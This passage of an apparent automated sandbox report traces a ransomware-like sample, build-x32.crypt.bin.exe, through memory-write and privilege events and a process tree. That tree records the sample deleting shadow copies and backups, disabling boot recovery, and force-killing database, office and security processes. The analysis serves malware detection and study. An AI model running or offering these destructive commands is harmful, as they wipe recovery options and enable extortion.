build-x32.crypt.bin.exe 263 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 -
Suspicious use of AdjustPrivilegeToken 131 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1476 WMIC.exe Token: SeSecurityPrivilege 1476 WMIC.exe Token: SeTakeOwnershipPrivilege 1476 WMIC.exe Token: SeLoadDriverPrivilege 1476 WMIC.exe Token: SeSystemProfilePrivilege 1476 WMIC.exe Token: SeSystemtimePrivilege 1476 WMIC.exe Token: SeProfSingleProcessPrivilege 1476 WMIC.exe Token: SeIncBasePriorityPrivilege 1476 WMIC.exe Token: SeCreatePagefilePrivilege 1476 WMIC.exe Token: SeBackupPrivilege 1476 WMIC.exe Token: SeRestorePrivilege 1476 WMIC.exe Token: SeShutdownPrivilege 1476 WMIC.exe Token: SeDebugPrivilege 1476 WMIC.exe Token: SeSystemEnvironmentPrivilege 1476 WMIC.exe Token: SeRemoteShutdownPrivilege 1476 WMIC.exe Token: SeUndockPrivilege 1476 WMIC.exe Token: SeManageVolumePrivilege 1476 WMIC.exe Token: 33 1476 WMIC.exe Token: 34 1476 WMIC.exe Token: 35 1476 WMIC.exe Token: SeIncreaseQuotaPrivilege 1476 WMIC.exe Token: SeSecurityPrivilege 1476 WMIC.exe Token: SeTakeOwnershipPrivilege 1476 WMIC.exe Token: SeLoadDriverPrivilege 1476 WMIC.exe Token: SeSystemProfilePrivilege 1476 WMIC.exe Token: SeSystemtimePrivilege 1476 WMIC.exe Token: SeProfSingleProcessPrivilege 1476 WMIC.exe Token: SeIncBasePriorityPrivilege 1476 WMIC.exe Token: SeCreatePagefilePrivilege 1476 WMIC.exe Token: SeBackupPrivilege 1476 WMIC.exe Token: SeRestorePrivilege 1476 WMIC.exe Token: SeShutdownPrivilege 1476 WMIC.exe Token: SeDebugPrivilege 1476 WMIC.exe Token: SeSystemEnvironmentPrivilege 1476 WMIC.exe Token: SeRemoteShutdownPrivilege 1476 WMIC.exe Token: SeUndockPrivilege 1476 WMIC.exe Token: SeManageVolumePrivilege 1476 WMIC.exe Token: 33 1476 WMIC.exe Token: 34 1476 WMIC.exe Token: 35 1476 WMIC.exe Token: SeBackupPrivilege 744 vssvc.exe Token: SeRestorePrivilege 744 vssvc.exe Token: SeAuditPrivilege 744 vssvc.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 1108 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1664 taskkill.exe Token: SeDebugPrivilege 1960 taskkill.exe Token: SeDebugPrivilege 284 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1548 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 1592 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 2024 taskkill.exe Token: SeDebugPrivilege 292 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1940 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1212 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 656 taskkill.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1356 taskkill.exe Token: SeDebugPrivilege 1076 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1820 taskkill.exe Token: SeDebugPrivilege 1396 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1356 taskkill.exe Token: SeDebugPrivilege 1076 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 668 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe"C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵PID:1660
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBFCService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sql*2⤵PID:2020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sql*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msaccess*2⤵PID:1432
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msaccess*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM mssql*2⤵PID:1436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM mssql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM mysql*2⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM mysql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵PID:1792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵PID:1600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵PID:1644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM supervise*2⤵PID:1948
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culture*2⤵PID:1028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵PID:1500
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM winword*2⤵PID:1092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM winword*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵PID:1108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵PID:1720
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵PID:1760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵PID:1664
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM httpd*2⤵PID:1960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵PID:284
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵PID:2008
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM java*2⤵PID:1580
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM java*3⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360se*2⤵PID:1548
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360se*3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵PID:1828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360doctor*3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵PID:1764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
- Kills process with taskkill
PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdhost*2⤵PID:1592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdhost*3⤵
- Kills process with taskkill
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM GDscan*2⤵PID:1656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM GDscan*3⤵
- Kills process with taskkill
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ZhuDongFangYu*2⤵PID:1968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ZhuDongFangYu*3⤵
- Kills process with taskkill
PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgrN*2⤵PID:2040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgrN*3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM mysqld*2⤵PID:2024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM mysqld*3⤵
- Kills process with taskkill
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AutodeskDesktopApp*2⤵PID:292
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AutodeskDesktopApp*3⤵
- Kills process with taskkill
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM acwebbrowser*2⤵PID:1088
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM acwebbrowser*3⤵
- Kills process with taskkill
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Creative Cloud*2⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Creative Cloud*3⤵
- Kills process with taskkill
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe Desktop Service*2⤵PID:1636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe Desktop Service*3⤵
- Kills process with taskkill
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM CoreSync*2⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM CoreSync*3⤵
- Kills process with taskkill
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe CEF Helper*2⤵PID:1652
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe CEF Helper*3⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM node*2⤵PID:1656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM node*3⤵
- Kills process with taskkill
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeIPCBroker*2⤵PID:1968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeIPCBroker*3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-taskbar*2⤵PID:1936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-taskbar*3⤵
- Kills process with taskkill
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-worker*2⤵PID:2012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-worker*3⤵
- Kills process with taskkill
PID:656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM InputPersonalization*2⤵PID:1836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM InputPersonalization*3⤵
- Kills process with taskkill
PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeCollabSync*2⤵PID:1800
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeCollabSync*3⤵
- Kills process with taskkill
PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCtrlCntr*2⤵PID:1396
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCtrlCntr*3⤵
- Kills process with taskkill
PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCcUxSys*2⤵PID:1560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCcUxSys*3⤵
- Kills process with taskkill
PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SimplyConnectionManager*2⤵PID:1924
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SimplyConnectionManager*3⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Simply.SystemTrayIcon*2⤵PID:884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Simply.SystemTrayIcon*3⤵
- Kills process with taskkill
PID:528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbguard*2⤵PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbguard*3⤵
- Kills process with taskkill
PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbserver*2⤵PID:2032
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbserver*3⤵
- Kills process with taskkill
PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ONENOTEM*2⤵PID:2024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ONENOTEM*3⤵
- Kills process with taskkill
PID:1356
-
-
-
